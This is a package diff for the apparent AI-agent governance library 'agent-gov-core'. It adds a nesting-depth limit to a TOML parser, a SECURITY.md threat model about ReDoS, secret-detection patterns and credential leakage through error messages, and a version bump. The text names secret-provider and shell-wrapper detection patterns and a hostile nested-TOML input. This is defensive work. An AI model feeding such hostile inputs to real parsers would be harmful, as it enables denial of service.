- if (wrapperMatch) {
344
- return getCommandHead(stripWrapperPrefixes(wrapperMatch[2]));
351
+ s = stripWrapperPrefixes(wrapperMatch[2]);
345
352
  }
346
353
  // Now extract first token, honoring quoting and obfuscation neutralization.
347
354
  const head = readFirstToken(s);
package/dist/toml.js CHANGED
@@ -34,6 +34,15 @@ class TomlParser {
34
34
  definedTables = new Set();
35
35
  /** Path of an array-of-tables table currently being filled. */
36
36
  aotPaths = new Set();
37
+ /**
38
+ * Current nesting depth through parseValue → parseArray|parseInlineTable →
39
+ * parseValue → … . Bounded so a hostile TOML like `{ a = { a = { … } } }`
40
+ * cannot blow the JS stack and crash a consumer that calls parseToml
41
+ * directly (readTomlObject's try/catch would catch RangeError, but defense
42
+ * in depth is cheap and a clean error is friendlier than a stack overflow).
43
+ */
44
+ valueDepth = 0;
45
+ static MAX_VALUE_DEPTH = 200;
37
46
  /**
38
47
  * Internal delimiter for joining dotted-key path components into a single
39
48
  * hashable string. NUL is illegal in TOML keys (basic strings can't contain
@@ -266,26 +275,35 @@ class TomlParser {
266
275
  this.expectLineEnd();
267
276
  }
268
277
  parseValue() {
269
- const c = this.src[this.pos];
270
- if (c === '"') {
271
- if (this.src[this.pos + 1] === '"' && this.src[this.pos + 2] === '"') {
272
- return this.parseMultilineBasicString();
273
- }
274
- return this.parseBasicString();
278
+ if (this.valueDepth >= TomlParser.MAX_VALUE_DEPTH) {
279
+ throw new Error(`TOML nesting too deep (>${TomlParser.MAX_VALUE_DEPTH}) at offset ${this.pos}`);
275
280
  }
276
- if (c === "'") {
277
- if (this.src[this.pos + 1] === "'" && this.src[this.pos + 2] === "'") {
278
- return this.parseMultilineLiteralString();
281
+ this.valueDepth++;
282
+ try {
283
+ const c = this.src[this.pos];
284
+ if (c === '"') {
285
+ if (this.src[this.pos + 1] === '"' && this.src[this.pos + 2] === '"') {
286
+ return this.parseMultilineBasicString();
287
+ }
288
+ return this.parseBasicString();
279
289
  }
280
- return this.parseLiteralString();
290
+ if (c === "'") {
291
+ if (this.src[this.pos + 1] === "'" && this.src[this.pos + 2] === "'") {
292
+ return this.parseMultilineLiteralString();
293
+ }
294
+ return this.parseLiteralString();
295
+ }
296
+ if (c === '[')
297
+ return this.parseArray();
298
+ if (c === '{')
299
+ return this.parseInlineTable();
300
+ if (c === 't' || c === 'f')
301
+ return this.parseBoolean();
302
+ return this.parseNumberOrDateTime();
303
+ }
304
+ finally {
305
+ this.valueDepth--;
281
306
  }
282
- if (c === '[')
283
- return this.parseArray();
284
- if (c === '{')
285
- return this.parseInlineTable();
286
- if (c === 't' || c === 'f')
287
- return this.parseBoolean();
288
- return this.parseNumberOrDateTime();
289
307
  }
290
308
  parseBasicString() {
291
309
  if (this.src[this.pos] !== '"')
@@ -0,0 +1,53 @@
1
+ # Security
2
+
3
+ This document describes the threat model `agent-gov-core` is designed against, what it deliberately does **not** protect against, and how to report a finding.
4
+
5
+ The substrate consumes a lot of untrusted input — JSON/TOML config bodies, shell command text, environment values — and runs regex evaluators over that input. The first edition of this document focuses on that surface. Other surfaces (denial of service via parser nesting, secret exfiltration through error messages) get short sections at the end.
6
+
7
+ ## Regex evaluation on untrusted input
8
+
9
+ ### What we protect against
10
+
11
+ All regex patterns shipped in the library are constructed to evaluate in **linear time** on any input. Specifically:
12
+
13
+ - **No nested quantifiers over overlapping character classes** — the classic ReDoS shape `(a+)+` or `(a|a)+` does not appear anywhere in `src/`.
14
+ - **Disjoint alternation** — every `(x|y|z)` group in the library has branches that are mutually exclusive at the first character (`(sudo|nohup|env|…)`, `(?:sk|rk)_(?:live|test)_…`, `("bare"|"quoted"|'literal')`), so the engine commits early and does not backtrack between branches.
15
+ - **Anchored where possible** — patterns that scan input from the start use `^`, so the regex engine does not retry from each position.
16
+ - **Library-defined, not user-supplied** — unlike tools that ship a heuristic ReDoS detector for arbitrary user regexes (e.g. [SessionTrail's `redos_pattern_in_workflow`](https://github.com/Conalh/session-trail)), this library never accepts a pattern from a caller. The patterns are constants compiled into the source tree, audited per release, and locked against regression by [`test/redos.test.mjs`](../test/redos.test.mjs).
17
+
18
+ The harness in `test/redos.test.mjs` exercises every regex evaluator that touches external input against ~100 KB of adversarial input shaped to trigger the worst backtracking path the pattern could exhibit (long benign, long near-miss, nested-quantifier-style). Each call must complete under a 50 ms wall-clock budget. The current worst case is the `bash -c` payload extractor at <10 ms — three orders of magnitude clear of catastrophic backtracking.
19
+
20
+ The audited regex evaluators are:
21
+
22
+ | File | Pattern family | Risk class |
23
+ |---|---|---|
24
+ | `src/secrets.ts` | 13 provider patterns (Anthropic, OpenAI, GitHub, AWS, Slack, Google, GitLab, npm, Docker, Stripe, hex token) | Safe by construction — fixed prefix + single quantifier over disjoint character class |
25
+ | `src/shell.ts` | Env-var assignment, wrapper detection (`sudo`, `nohup`, …), dash-`c` runner detection (`bash`, `python`, …) | Safe by construction — anchored, fixed alternation |
26
+ | `src/locators.ts` | TOML header regex, dynamically-built dotted-key regex, JSON key/value locators | Safe by construction — literal anchors separate every quantifier |
27
+ | `src/mcp.ts` | Windows executable suffix, trailing slash normalization | Safe by construction — single anchored quantifier |
28
+
29
+ ### What we don't protect against
30
+
31
+ - **The `dottedKey` argument to `lineOfTomlKey` is treated as developer-supplied, not attacker-supplied.** If a consumer passes a 100 KB attacker-controlled string with embedded regex metacharacters as the `dottedKey`, the dynamic regex constructed from that key can exceed V8's regex-bytecode size limit and throw `SyntaxError` during construction. This is misuse, not a vulnerability: in every consumer of this library (ScopeTrail, PolicyMesh, CapabilityEcho, TaskBound, SessionTrail) the dotted-key search target is derived from the static finding schema, never from input. Callers who route untrusted text into the `dottedKey` parameter should length-cap it themselves before calling.
32
+ - **RE2 is not a runtime dependency.** The library uses Node's built-in regex engine (V8 Irregexp), which is a backtracking NFA. The safety claim above rests on every shipped pattern being structurally non-pathological, not on the engine refusing to backtrack. A future maintainer who introduces a vulnerable pattern would not be caught by the engine — they would be caught by `test/redos.test.mjs` failing in CI.
33
+ - **The SessionTrail user-supplied-pattern vector does not apply.** SessionTrail ships a detector that flags ReDoS-vulnerable shapes in *user-authored* workflow regexes (e.g. a GitHub Actions workflow that runs `grep -E "<user pattern>"`). `agent-gov-core` has no equivalent surface — there is no API by which a caller can hand the library a pattern to evaluate.
34
+
35
+ ## Other surfaces
36
+
37
+ ### Secret material in error messages
38
+
39
+ `matchSecret` returns only the provider name, never the literal credential. This contract is asserted in `test/secrets.test.mjs`. Consumers that surface findings to a logging system can do so without leaking the matched bytes.
40
+
41
+ `ConfigParseError` carries the original parser error in its `cause`. The original error may contain a snippet of the offending input — if that input held a credential, the credential is in the cause chain. Consumers logging structured findings should not log `error.cause` verbatim.
42
+
43
+ ## Reporting a finding
44
+
45
+ Open a private security advisory at https://github.com/Conalh/agent-gov-core/security/advisories or email **conal.hg@gmail.com**. Please include:
46
+
47
+ - The version (e.g. `v0.8.0`) and the file/function involved.
48
+ - An input that demonstrates the issue, ideally as a failing test.
49
+ - For ReDoS reports specifically: the wall-clock time the input takes on your machine plus the input size, so the budget in `test/redos.test.mjs` can be calibrated.
50
+
51
+ Reports will be acknowledged within seven days. A patch release follows the same cadence as other security-relevant fixes (`v0.7.1`, `v0.8.x`) — small, targeted, separately tagged, with the affected versions documented in `CHANGELOG.md`.
52
+
53
+ The library is pre-1.0 and shipped under MIT with no warranty. Best-effort fixes only; no SLA.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "agent-gov-core",
3
- "version": "0.7.1",
3
+ "version": "0.8.1",
4
4
  "description": "Shared primitives for the AI-agent governance suite: Finding schema, JSONC/TOML readers, line locators, MCP command normalization, shell tokenization, and GitHub Action helpers.",
5
5
  "type": "module",
6
6
  "main": "./dist/index.js",